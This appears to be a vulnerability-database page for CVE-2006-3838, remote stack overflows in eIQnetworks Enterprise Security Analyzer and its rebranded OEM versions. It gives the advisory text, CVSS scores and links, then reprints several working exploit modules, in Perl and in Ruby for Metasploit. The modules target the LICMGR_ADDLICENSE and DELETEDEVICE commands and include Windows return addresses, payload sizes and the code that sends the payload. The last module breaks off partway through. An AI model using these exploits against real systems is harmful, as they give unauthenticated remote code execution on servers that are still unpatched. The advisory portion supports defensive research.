CVE-2006-3838
CVSS 10.0
Published: 2006-07-26 21:04:00
Revised: 2011-09-06 00:00:00

[Original] Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe).


[CNNVD] eIQnetworks ESA EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE Command Remote Buffer Overflow (CNNVD-200607-454)

eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-grade security management platform.
A buffer overflow vulnerability exists in EnterpriseSecurityAnalyzer.exe, which in eIQnetworks ESA binds to TCP port 10616 by default; a remote attacker could exploit it to execute arbitrary instructions on the server.

When EnterpriseSecurityAnalyzer.exe processes an overly long argument passed to the LICMGR_ADDLICENSE command, a stack overflow can be triggered, leading to execution of arbitrary instructions.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [no authentication is required to exploit]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3838
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3838
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-454
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/513068
(UNKNOWN)  CERT-VN  VU#513068
http://xforce.iss.net/xforce/xfdb/27954
(UNKNOWN)  XF  eiqnetworks-esa-monitoring-bo(27954)
http://xforce.iss.net/xforce/xfdb/27953
(UNKNOWN)  XF  eiqnetworks-esa-topology-bo(27953)
http://xforce.iss.net/xforce/xfdb/27952
(UNKNOWN)  XF  eiqnetworks-esa-licensemanager-bo(27952)
http://xforce.iss.net/xforce/xfdb/27951
(UNKNOWN)  XF  eiqnetworks-esa-syslog-command-bo(27951)
http://xforce.iss.net/xforce/xfdb/27950
(UNKNOWN)  XF  eiqnetworks-esa-syslog-string-bo(27950)
http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
(UNKNOWN)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
(UNKNOWN)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
http://www.vupen.com/english/advisories/2006/3010
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3010
http://www.vupen.com/english/advisories/2006/3009
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3009
http://www.vupen.com/english/advisories/2006/3008
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3008
http://www.vupen.com/english/advisories/2006/3007
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3007
http://www.vupen.com/english/advisories/2006/3006
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3006
http://www.vupen.com/english/advisories/2006/2985
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2985
http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
(UNKNOWN)  MISC  http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
http://www.tippingpoint.com/security/advisories/TSRT-06-04.html
(UNKNOWN)  MISC  http://www.tippingpoint.com/security/advisories/TSRT-06-04.html
http://www.tippingpoint.com/security/advisories/TSRT-06-03.html
(VENDOR_ADVISORY)  MISC  http://www.tippingpoint.com/security/advisories/TSRT-06-03.html
http://www.securityfocus.com/bid/19167
(UNKNOWN)  BID  19167
http://www.securityfocus.com/bid/19165
(UNKNOWN)  BID  19165
http://www.securityfocus.com/bid/19164
(UNKNOWN)  BID  19164
http://www.securityfocus.com/bid/19163
(UNKNOWN)  BID  19163
http://www.securityfocus.com/archive/1/archive/1/441200/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/441198/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/441197/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 ZDI-06-023: eIQNetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/441195/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 ZDI-06-024: eIQNetworks Enterprise Security Analyzer License Manager Buffer Overflow Vulnerability
http://www.osvdb.org/27528
(UNKNOWN)  OSVDB  27528
http://www.osvdb.org/27527
(UNKNOWN)  OSVDB  27527
http://www.osvdb.org/27526
(UNKNOWN)  OSVDB  27526
http://www.osvdb.org/27525
(UNKNOWN)  OSVDB  27525
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf
(UNKNOWN)  CONFIRM  http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf
http://securitytracker.com/id?1016580
(UNKNOWN)  SECTRACK  1016580
http://secunia.com/advisories/21218
(VENDOR_ADVISORY)  SECUNIA  21218
http://secunia.com/advisories/21217
(VENDOR_ADVISORY)  SECUNIA  21217
http://secunia.com/advisories/21215
(VENDOR_ADVISORY)  SECUNIA  21215
http://secunia.com/advisories/21214
(VENDOR_ADVISORY)  SECUNIA  21214
http://secunia.com/advisories/21213
(VENDOR_ADVISORY)  SECUNIA  21213
http://secunia.com/advisories/21211
(VENDOR_ADVISORY)  SECUNIA  21211
http://archive.cert.uni-stuttgart.de/bugtraq/2006/08/msg00152.html
(UNKNOWN)  BUGTRAQ  20060808 TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities

- Vulnerability information

eIQnetworks ESA EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE Command Remote Buffer Overflow
Critical  Buffer overflow
2006-07-26 00:00:00 2007-04-16 00:00:00
Remote
eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-grade security management platform.
A buffer overflow vulnerability exists in EnterpriseSecurityAnalyzer.exe, which in eIQnetworks ESA binds to TCP port 10616 by default; a remote attacker could exploit it to execute arbitrary instructions on the server.

When EnterpriseSecurityAnalyzer.exe processes an overly long argument passed to the LICMGR_ADDLICENSE command, a stack overflow can be triggered, leading to execution of arbitrary instructions.

- Advisories and patches

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
http://www.eiqnetworks.com/

- Vulnerability information (2074)

eIQnetworks License Manager Remote Buffer Overflow Exploit (1262) (EDBID:2074)
windows remote
2006-07-26 Verified
10616 ri0t
N/A
#!/usr/bin/perl -w

#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs

package Msf::Exploit::EiQ_License_1262; 
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'     => 'EIQ License Manager Overflow',
	'Authors'  => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp' ],
	'Priv'  => 0,
	
	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
	
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10616],
	 },
        'Payload'  =>
	  {
		'Space' => 1262,
		'BadChars'  => "\x00\x0a\x0d\x40\x26",
            },
          'Description'  =>  Pex::Text::Freeform(qq{
	This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
        Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
	in size. This module should work on all rebranded eiq analysers.  Exploitation
	assistance from KF of digital munition.
        }),
          
          
        'DefaultTarget' => 1,
	'Targets' =>
	  [
	        ['Windows 2000 SP0-SP4 English', 0x750316e2],   # call ebx
		['Windows XP English SP1/SP2', 0x77db64dc ],	# jmp ebx
	        ['Windows Server 2003 English SP0/SP1', 0x77d16764 ],   # jmp ebx
	  ],
          
  };
  
  sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}
  
  sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];
        my $nops 	= $self->MakeNops(1262 - length($shellcode));
        my $ret         =  pack("V", $target->[1]);
        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
	
            
        my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
    	  );
          
          if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
          
          $s->Send("$evil");
          return;
  }

# milw0rm.com [2006-07-26]
		

- Vulnerability information (2140)

eIQnetworks License Manager Remote Buffer Overflow Exploit (multi) (EDBID:2140)
windows remote
2006-08-07 Verified
10616 ri0t
N/A
#!/usr/bin/perl -w

package Msf::Exploit::EiQ_License; 
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'     => 'EIQ License Manager Overflow',
	'Authors'  => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp' ],
	'Priv'  => 0,
	
	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
	
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10616],
	 },
        'Payload'  =>
	  {
		'Space' => 494,
		'BadChars'  => "\x00\x0a\x0d\x40\x26",
            },
          'Description'  =>  Pex::Text::Freeform(qq{
        This module Exploits a buffer overflow in the LICENCE_MANAGER field of
	EiQ networks Enterprise Security Analyzer.  This bug was found by Titon
	of Bastard Labs. 
        }),
        

	'Refs' =>
	[
		['OSVDB', '27526'],
	],
          
        'DefaultTarget' => 1,
	'Targets' =>
	  [
		['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ],   # call ebx
		['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ],	# jmp ebx
		['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ],   # jmp EBX
		['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
		['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
		['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
	        ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
	        ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
         ], 
  };
  
  sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}
  
  sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];
	my $nopsize = $target->[2];
        my $nops 	= $self->MakeNops($nopsize - length($shellcode));
        my $ret         =  pack("V", $target->[1]);
        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
	
            
        my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
    	  );
          
          if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
          
          $s->Send("$evil");
          return;
  }

# milw0rm.com [2006-08-07]
		

- Vulnerability information (16438)

eIQNetworks ESA Topology DELETEDEVICE Overflow (EDBID:16438)
windows remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: eiqnetworks_esa_topology.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the DELETEDEVICE command in the Topology
				server, a stack-based buffer overflow occurs.

				This module has only been tested against ESA v2.1.13.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-3838'],
					['OSVDB', '27528'],
					['BID', '19164'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 250,
					'BadChars' => "\x00\x0a\x0d\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x77d57447 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 25 2006'
			))

		register_options(
			[
				Opt::RPORT(10628)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler  =  rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)

		sploit  =  "DELETEDEVICE&" + filler + payload.encoded

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- Vulnerability information (16451)

eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow (EDBID:16451)
windows remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: eiqnetworks_esa.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the LICMGR_ADDLICENSE command, a stack-based
				buffer overflow occurs. This module has only been tested
				against ESA v2.1.13.
			},
			'Author'         => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>',  'kf' ],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-3838'],
					['OSVDB', '27526'],
					['BID', '19163'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-024.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],

					['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 494 } ],   # call ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2',      { 'Ret' =>  0x77db64dc, 'Offset' => 494 } ],	# jmp ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1',     { 'Ret' =>  0x77d16764, 'Offset' => 494 } ],   # jmp EBX
					['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English',        { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',       { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2',         { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',{ 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2',   { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',   { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',     { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English',          { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2',            { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',   { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 24 2006'
			))

		register_options(
			[
				Opt::RPORT(10616)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler =  rand_text_english(1) * (target['Offset'] - payload.encoded.length)
		sploit =  "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') +  "&";

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83079)

eIQNetworks ESA Topology DELETEDEVICE Overflow (PacketStormID:F83079)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-3838

This Metasploit module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This Metasploit module has only been tested against ESA v2.1.13.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the DELETEDEVICE command in the Topology
				server, a stacked based buffer overflow occurs.

				This module has only been tested against ESA v2.1.13.

			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3838'],
					['OSVDB', '27528'],
					['BID', '19164'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 250,
					'BadChars' => "\x00\x0a\x0d\x20",
	      			'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x77d57447 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ],  
				],

			'Privileged'     => false,

			'DisclosureDate' => 'July 25 2006'
						
			))

			register_options(
			[
				Opt::RPORT(10628)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler  =  rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)

		sploit  =  "DELETEDEVICE&" + filler + payload.encoded  

		sock.put(sploit)

		handler
		disconnect				
	end

end
    

- Vulnerability information (F83050)

eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow (PacketStormID:F83050)
2009-11-26 00:00:00
ri0t,MC,kf  metasploit.com
exploit,overflow
CVE-2006-3838

This Metasploit module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This Metasploit module has only been tested against ESA v2.1.13.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the LICMGR_ADDLICENSE command, a stack-based
				buffer overflow occurs. This module has only been tested
				against ESA v2.1.13.
			},
			'Author'         => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>',  'kf' ],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2006-3838'],
					['OSVDB', '27526'],
					['BID', '19163'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-024.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
	      			'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],  
				
					['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 494 } ],   # call ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2',      { 'Ret' =>  0x77db64dc, 'Offset' => 494 } ],	# jmp ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1',     { 'Ret' =>  0x77d16764, 'Offset' => 494 } ],   # jmp EBX
					['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English',        { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',       { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2',         { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',{ 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2',   { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',   { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',     { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English',          { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2',            { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',   { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],					
				],

			'Privileged'     => false,

			'DisclosureDate' => 'July 24 2006'

			))

			register_options(
			[
				Opt::RPORT(10616)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

